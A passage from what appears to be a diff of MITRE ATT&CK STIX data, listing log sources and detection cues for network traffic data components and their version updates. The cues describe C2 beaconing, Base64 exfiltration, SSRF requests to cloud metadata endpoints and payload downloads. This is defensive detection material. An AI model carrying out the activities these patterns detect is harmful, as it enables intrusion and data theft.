+                            "channel": "HTTP POST with encoded content in user-agent or cookie field"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Suspicious outbound HTTPS requests to domains flagged as newly registered or untrusted after spearphishing message interaction"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log stream (subsystem: com.apple.system.networking)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Encrypted connection with anomalous payload entropy"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Rapid incoming TLS handshakes or HTTP requests in quick succession"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "network, socket, and http logs"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "DNS responses followed by connections to ports outside standard ranges"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Persistent outbound traffic to mining domains"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Encrypted session initiation by unexpected binary"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "eventMessage = 'promiscuous'"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "outbound HTTPS connections to code repository APIs"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "eventMessage = 'open', 'sendto', 'connect'"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "dns-sd, mDNSResponder, socket activity"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process + network activity"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "subsystem=com.apple.WebKit"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "subsystem: com.apple.WebKit or com.apple.WebKit.Networking"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "encrypted outbound traffic carrying unexpected application data"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Persistent outbound connections with consistent periodicity"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "TLS connections with abnormal handshake sequence or self-signed cert"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Web server process initiating outbound TCP connections not tied to normal server traffic"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "outbound TLS connections to cloud storage providers"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "outbound HTTPS connections to cloud storage APIs"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process, network"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process = 'ssh' OR eventMessage CONTAINS 'ssh'"
+                        },
+                        {
+                            "name": "Netfilter/iptables",
+                            "channel": "Forwarded packets log"
+                        },
+                        {
+                            "name": "Network Traffic",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "networkconfig ",
+                            "channel": "interface flag PROMISC, netstat | ip link | ethtool"
+                        },
+                        {
+                            "name": "networkdevice:config",
+                            "channel": "NAT table modification (add/update/delete rule)"
+                        },
+                        {
+                            "name": "networkdevice:IDS",
+                            "channel": "content inspection / PCAP / HTTP body"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "ACL/Firewall rule modification or new route injection"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "config change (e.g., logging buffered, pcap buffers)"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "Authentication failures, unexpected community string usage, or unauthorized SNMPv1/v2 requests"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "Authentication failures or unusual community string usage in SNMP queries"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "Symmetric encryption detected without TLS handshake sequence"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "TLS handshake + HTTP headers"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "Abnormal certificate chains or non-standard ports carrying TLS"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "Unusual POST requests to admin or upload endpoints"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "Outbound connections to internal enterprise services exhibiting anomalous protocol behavior, malformed sessions, or exploit-consistent traffic patterns"
+                        },
+                        {
+                            "name": "NSM:Content",
+                            "channel": "SSL Certificate Metadata"
+                        },
+                        {
+                            "name": "NSM:Content",
+                            "channel": "HTTP Header Metadata"
+                        },
+                        {
+                            "name": "NSM:Content",
+                            "channel": "TLS Fingerprint and Certificate Analysis"
+                        },
+                        {
+                            "name": "NSM:Content",
+                            "channel": "Traffic on RPC DRSUAPI"
+                        },
+                        {
+                            "name": "NSM:Firewall",
+                            "channel": "TLS/HTTP inspection"
+                        },
+                        {
+                            "name": "NSM:Firewall",
+                            "channel": "High rate of inbound TCP SYN or ACK packets with missing 3-way handshake completion"
+                        },
+                        {
+                            "name": "NSM:Firewall",
+                            "channel": "Anomalous TCP SYN or ACK spikes from specific source or interface"
+                        },
+                        {
+                            "name": "NSM:Firewall",
+                            "channel": "Outbound encrypted traffic"
+                        },
+                        {
+                            "name": "NSM:Firewall",
+                            "channel": "ICMP/UDP protocol anomaly"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "mqtt.log / xmpp.log (custom log feeds)"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "mqtt.log or AMQP custom log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "mqtt.log, xmpp.log, amqp.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "TCP/UDP"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "TCP session tracking"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Captured packet payloads"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "session behavior"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "External C2 channel over TLS"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http/file-xfer: Inbound/outbound transfer of ELF shared objects"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http.log, files.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "unexpected network activity initiated shortly after shell session starts"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "HTTP/WebDAV requests that contain NTLMSSP or PROPFIND/MOVE/OPTIONS with Authorization: NTLM"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http.log, ssl.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http.log, conn.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "SPAN or port-mirrored HTTP/S"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http.log, ssl.log, websocket.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "ssl.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Browser connections to known C2 or dynamic DNS domains"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Session History Reset"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "HTTP "
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "query: High-volume LDAP traffic with filters targeting groupPolicyContainer attributes"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "HTTP/TLS Logs"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Suspicious URL patterns, uncommon TLDs, short-lived domains, URL shorteners; HTTP method GET/POST"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Suspicious URL patterns, uncommon TLDs, URL shorteners"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Suspicious GET/POST; downloader patterns"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "SSH logins or scp activity"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "remote login and transfer"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "conn.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Suspicious long-lived or reattached remote desktop sessions from unexpected IPs"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "HTTP payloads with SQLi/LFI/JNDI/deserialization indicators"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "outbound egress from web host after suspicious request"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Requests towards cloud metadata or command & control from pod IPs"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Connections to TCP 427 (SLP) or vCenter web services from untrusted sources"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "NetFlow/sFlow for odd egress to Internet from mgmt plane"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "packet capture or DPI logs"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "SMB2_LOGOFF/SMB_TREE_DISCONNECT"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Unusual Base64-encoded content in URI, headers, or POST body"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Base64 strings or gzip in URI, headers, or POST body"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Inbound connections to 445, 3389, 5985-5986 with high error/connection-reset rate, followed by new outbound sessions from the same host to internal assets within short interval."
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Inbound connections to monitored service ports from external or unusual internal sources; rapid follow-on lateral connections from the same host."
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Inbound to tcp/427 (OpenSLP), tcp/443 (vSphere APIs), tcp/902, tcp/5989 followed by new unexpected outbound sessions from the ESXi/vCenter host."
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Inbound to 22/5900/8080 and follow-on internal connections."
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http: HTTP body or headers contain long Base64 sections; gzip/deflate + Base64"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http: HTTP body contains long Base64 sections"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http: Base64/MIME looking payloads from ESXi host IP"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "LDAP Bind/Search"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "LDAP Query"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "smtp.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "smtp.log, conn.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "remote CLI session detection"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http.log, ftp.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "PCAP inspection"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "large HTTPS POST requests to webhook endpoints"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Single, low-volume inbound packet (REJ/S0/OTH or uncommon dport/protocol) from src_ip followed by outbound SF connection to src_ip."
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Rare inbound packet characteristics (ICMP/UDP/TCP to uncommon port) from src_ip followed \u2264TimeWindow by outbound SF from same host to src_ip."
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Inbound one-off packet to uncommon port \u2192 outbound SF to same src_ip within TimeWindow."
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "large upload to firmware interface port or path"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http.request: HTTP requests and responses for specific script resources, unexpected content-types (application/octet-stream for script URLs), suspicious referrers, or obfuscated javascript resources"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http::response: HTTP responses with suspicious content-type for scripts, long obfuscated javascript bodies, or redirects to exploit kit domains"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "HTTP/HTTPS requests for script resources flagged by content inspection (excessive obfuscation, eval usage, unusual redirects)"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "ssl.log + http.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http/file-xfer: Outbound transfer of large video-like MIME types soon after capture"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound SCP, TFTP, or FTP sessions carrying configuration file content"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Session Transfer Content"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Captured File Content"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "C2 exfiltration"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Transferred file observations"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http::post: Outbound HTTP POST from host shortly after DB export activity"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "HTTPS API requests to Dropbox, iCloud, Google Drive, OneDrive shortly after DB tool usage"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Observed downgrade in negotiated cipher suites or TLS/SSH versions across sessions"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "New egress from container IP/namespace to Internet or non-approved CIDRs/ASNs"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "New VM egress to crypto-mining pools or non-approved Internet ranges within minutes of boot"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http::request: Network connection to package registry or C2 from interpreter shortly after install"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http::request: Outbound HTTP initiated by Python interpreter"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "DrsAddEntry, DrsReplicaAdd, GetNCChanges calls between non-DC and DCs."
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "large HTTPS POST requests to text storage domains"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Unexpected ARP replies or DNS responses inconsistent with authoritative servers"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "TLS downgrade or inconsistent DNS answers"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Unusual request pattern leading up to service crash (e.g., malformed or oversized payload)"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "conn.log or http.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http: HTTP bodies/headers contain long tokens with non-standard alphabets or constant-size periodic POSTs"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "dns: DNS labels with excessive length and restricted custom alphabets (e.g., base36 only) repeated frequently"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http: suspicious long tokens with custom alphabets in body/headers"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http: HTTP bodies from ESXi host IPs containing long, non-standard tokens"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Traffic patterns showing downgrade from strong encryption (AES-256) to weaker or plaintext protocols"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "HTTP(S) requests with User-Agents typical of PowerShell or curl from desktop; or URIs matching paste-inspired payload hosts"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Egress to non-approved networks from host after terminal exec"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Flow/PCAP analysis for outbound payloads"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "conn.log + files.log + ssl.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "HTTPS or custom protocol traffic with large payloads"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Unexpected script or binary content returned in HTTP response body"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Injected content responses with unexpected script/malware signatures"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Content injection observed in HTTPS responses with mismatched certificates or altered payloads"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Relay patterns across IP hops"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "ldap.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Probe responses from unauthorized APs responding to client probe requests"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Excessive gratuitous ARP replies on local subnet"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Inbound HTTP POST with suspicious payload size or user-agent"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "POST requests to .php, .jsp, .aspx files with high entropy body"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "dns.log"
+                        },
+                        {
+                            "name": "NSM:FLow",
+                            "channel": "dns.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Encrypted tunnels or proxy traffic to non-standard destinations"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "large transfer from management IPs to unauthorized host"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Sustained abnormal inbound request rate targeting application ports (e.g., 80/443/25)"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "ftp.log, smb_files.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "ftp.log, conn.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "mirror/SPAN port"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "ftp.log, conn.log, smb_files.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "SSL/TLS Inspection or PCAP"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "conn.log, ssl.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http, dns, smb, ssl logs"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "dns, ssl, conn"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "conn.log, http.log, dns.log, ssl.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "ICMP/UDP traffic (Wireshark, Suricata, Zeek)"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "icmp.log, weird.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "ICMP/UDP monitoring (tcpdump, Wireshark, Zeek)"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Unusual responses to LLMNR (UDP 5355) or NBT-NS (UDP 137) queries from unauthorized hosts"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "DHCP OFFER or ACK with unauthorized DNS/gateway parameters"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Multiple DHCP OFFER responses for a single DISCOVER"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "SSL/TLS Handshake Analysis"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "HTTP Header Metadata"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Network Capture TLS/HTTP"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "container egress to unknown IPs/domains"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "HTTP Request Logging"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "ssh connections originating from third-party CIDRs"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "ssh/smb connections to internal resources from third-party devices"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Degraded encryption throughput or switch to weaker cipher suites compared to historical baselines"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "ssl.log (for TLS handshake analysis), dns.log (tunneling indicators)"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "host switch egress data"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound HTTP/S"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "ssl.log - Certificate Analysis"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "ssl.log, conn.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "ssl.log, x509.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Packets with unusual flags or payloads outside established flows (e.g., WoL magic FF\u00d76 + 16\u00d7MAC)"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Suspicious POSTs to upload endpoints"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "TLS/HTTP download with atypical MIME (application/octet-stream, application/x-zip, application/x-gzip) followed by local decode/write"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "HTTP(S)/QUIC media download with opaque content types (image/*, audio/*, video/*) from non-gallery domains or CDNs not previously used by the app"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "HTTP(S)/QUIC download of executable/opaque content (application/octet-stream, application/zip, application/java-archive, application/x-dex, application/x-sharedlib, text/javascript)"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "burst of DNS queries/connection attempts to RFC1918 or local gateway immediately after scans"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "HTTPS sessions exhibiting periodic request cadence or structured payload exchanges inconsistent with application baseline"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Application-layer indicators observable via enterprise network controls (HTTP method, URI path pattern class, TLS SNI, JA3/ALPN when available, DNS qname/type) showing anomalous or low-and-slow command polling behavior"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Near-term increase in traffic to identity endpoints associated with SMS MFA, account recovery, or OTP verification (IdP, banking, crypto), correlated to SIM/service loss"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Abrupt shift from cellular egress to Wi-Fi-only egress, or new VPN/proxy session establishment following cellular service loss"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Application-layer web traffic showing suspicious redirect chains, iframe/ad-tech cascades, user-agent or environment fingerprinting requests, or staged payload retrieval after page visit"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Application initiates HTTPS connection with repeated certificate validation failure under enterprise proxy followed by direct network retry or stable opaque TLS communication to same endpoint within correlation window"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "App-destination pair shows consistent inspection bypass/refusal pattern followed by direct encrypted communication or repeated short-lived TLS sessions to same endpoint within correlation window"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Application retrieves remote content from non-baselined domain or IP and the transfer direction is inbound to device during the file acquisition phase"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Managed iOS app retrieves remote content from non-baselined domain or IP with inbound payload transfer during the acquisition phase"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Device shows correlated inbound session establishment followed by outbound connections to separate external destinations with overlapping timing and relay-like byte symmetry"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Traffic spike preceding control crash"
+                        },
+                        {
+                            "name": "NSM:Inspection",
+                            "channel": "TLS session from mobile app fails, resets, or refuses enterprise interception while same destination/app pair repeatedly establishes direct encrypted communication pattern consistent with pinned certificate/public-key validation"
+                        },
+                        {
+                            "name": "NSM:Inspection",
+                            "channel": "TLS handshake from iOS app repeatedly fails or is rejected only when enterprise SSL inspection certificate is presented, indicating certificate or public-key pin validation effect"
+                        },
+                        {
+                            "name": "saas:box",
+                            "channel": "API calls exceeding baseline thresholds"
+                        },
+                        {
+                            "name": "saas:confluence",
+                            "channel": "REST API access from non-browser agents"
+                        },
+                        {
+                            "name": "TelecomLogs:SS7Signaling",
+                            "channel": "Subscriber information queries, routing requests, or location update messages with anomalous node identifiers or unexpected origin patterns"
+                        },
+                        {
+                            "name": "TelecomLogs:SS7Signaling",
+                            "channel": "Location resolution, routing, or subscriber information exchanges with anomalous signaling paths or node identities"
+                        },
+                        {
+                            "name": "VPN:MobileProxy",
+                            "channel": "Supervised or newly activated device initiates outbound connections to destinations outside Apple, MDM, update, or enterprise-managed baselines while locked, with no recent user interaction, or before expected app enrollment completion"
+                        },
+                        {
+                            "name": "VPN:MobileProxy",
+                            "channel": "Application or device component communicates with legitimate external web-service infrastructure such as cloud storage, social media, messaging, collaboration, paste, code-hosting, CDN-backed API, or generic HTTPS service in a pattern inconsistent with the app's approved network baseline, timing, or service class"
+                        },
+                        {
+                            "name": "VPN:MobileProxy",
+                            "channel": "Supervised device or managed app communicates with legitimate external web-service infrastructure such as cloud storage, messaging, collaboration, social, paste, or generic HTTPS API platforms in a pattern inconsistent with expected service baseline, managed app role, or normal background refresh behavior"
+                        },
+                        {
+                            "name": "VPN:MobileProxy",
+                            "channel": "App-attributed HTTP GET or HTTPS session to public web platform (social, paste, collaboration, cloud storage, code-hosting) returned content followed by outbound connection to a different domain or IP within TimeWindow"
+                        },
+                        {
+                            "name": "VPN:MobileProxy",
+                            "channel": "DNS query or TLS SNI for previously unseen domain occurred within TimeWindow after session to legitimate web-service domain from same app identity"
+                        },
+                        {
+                            "name": "VPN:MobileProxy",
+                            "channel": "Initial session to public web-service domain transferred small response payload followed by connection to new external endpoint with different ASN or domain category"
+                        },
+                        {
+                            "name": "VPN:MobileProxy",
+                            "channel": "App-attributed session to public web-service domain included inbound content retrieval followed by outbound POST, PUT, upload, comment, message send, document update, or API write to same service class within TimeWindow"
+                        },
+                        {
+                            "name": "VPN:MobileProxy",
+                            "channel": "Repeated alternating inbound and outbound sessions to same public web-service domain or API endpoint occurred from same app identity with stable recurrence interval"
+                        },
+                        {
+                            "name": "VPN:MobileProxy",
+                            "channel": "Outbound write operation to public web-service domain occurred after small inbound response retrieval from same domain or service class without preceding user-visible foreground activity"
+                        },
+                        {
+                            "name": "VPN:MobileProxy",
+                            "channel": "App-attributed HTTP GET, content fetch, sync pull, or inbound-oriented HTTPS session to public web-service domain recurred within TimeWindow without app-attributed POST, PUT, PATCH, upload, comment, message send, or API write to same service class"
+                        },
+                        {
+                            "name": "VPN:MobileProxy",
+                            "channel": "Repeated app-attributed retrieval from same public web-service domain or API endpoint occurred at stable recurrence interval with low outbound volume relative to inbound content"
+                        },
+                        {
+                            "name": "VPN:MobileProxy",
+                            "channel": "Inbound content retrieval from public web-service domain occurred without subsequent writeback to same service class and was followed by local or downstream activity outside normal app sync profile"
+                        },
+                        {
+                            "name": "VPN:MobileProxy",
+                            "channel": "TLS handshake, HTTP method/header pattern, or WebSocket upgrade was observed on destination port outside approved port set for detected protocol during app-attributed outbound session"
+                        },
+                        {
+                            "name": "VPN:MobileProxy",
+                            "channel": "Repeated app-attributed sessions to same destination or service class used non-standard destination port with stable recurrence interval or persistent connection behavior"
+                        },
+                        {
+                            "name": "VPN:MobileProxy",
+                            "channel": "Destination port was not in approved protocol-to-port mapping for app identity or service class and session did not match known enterprise proxy, relay, or developer tooling exception"
+                        },
+                        {
+                            "name": "VPN:MobileProxy",
+                            "channel": "Observed protocol-to-port pairing was outside approved mapping for managed bundle or service class and did not match enterprise proxy, relay, or developer tooling exception"
+                        },
+                        {
+                            "name": "WebProxy:AccessLogs",
+                            "channel": "SSRF-like patterns accessing metadata endpoint through proxy (e.g., Host: 169.254.169.254)"
+                        },
+                        {
+                            "name": "WIDS:AssociationLogs",
+                            "channel": "Unauthorized AP or anomalous MAC address connection attempts"
+                        },
+                        {
+                            "name": "WinEventLog:iis",
+                            "channel": "IIS Logs"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-Windows Defender/Operational",
+                            "channel": "Unusual external domain access"
+                        },
+                        {
+                            "name": "WinEventLog:Sysmon",
+                            "channel": "Outbound requests with forged tokens/cookies in headers"
+                        },
+                        {
+                            "name": "WinEventLog:System",
+                            "channel": "EventCode=5005 (WLAN), EventCode=302 (Bluetooth)"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "2.1",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "mobile-attack",
+                        "enterprise-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.771000+00:00\", \"old_value\": \"2026-04-22 14:48:50.367000+00:00\"}}}",
+                    "previous_version": "2.1"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.274000+00:00",
+                    "modified": "2026-05-12 15:12:00.777000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0078",
+                            "external_id": "DC0078"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Network Traffic Flow",
+                    "description": "Summarized network packet data that captures session-level details such as source/destination IPs, ports, protocol types, timestamps, and data volume, without storing full packet payloads. This is commonly used for traffic analysis, anomaly detection, and network performance monitoring.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "Network Traffic",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "socket_events"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Unexpected flows between segmented networks or prohibited ports"
+                        },
+                        {
+                            "name": "snmp:config",
+                            "channel": "Configuration change traps or policy enforcement failures"
+                        },
+                        {
+                            "name": "NSM:Flow",
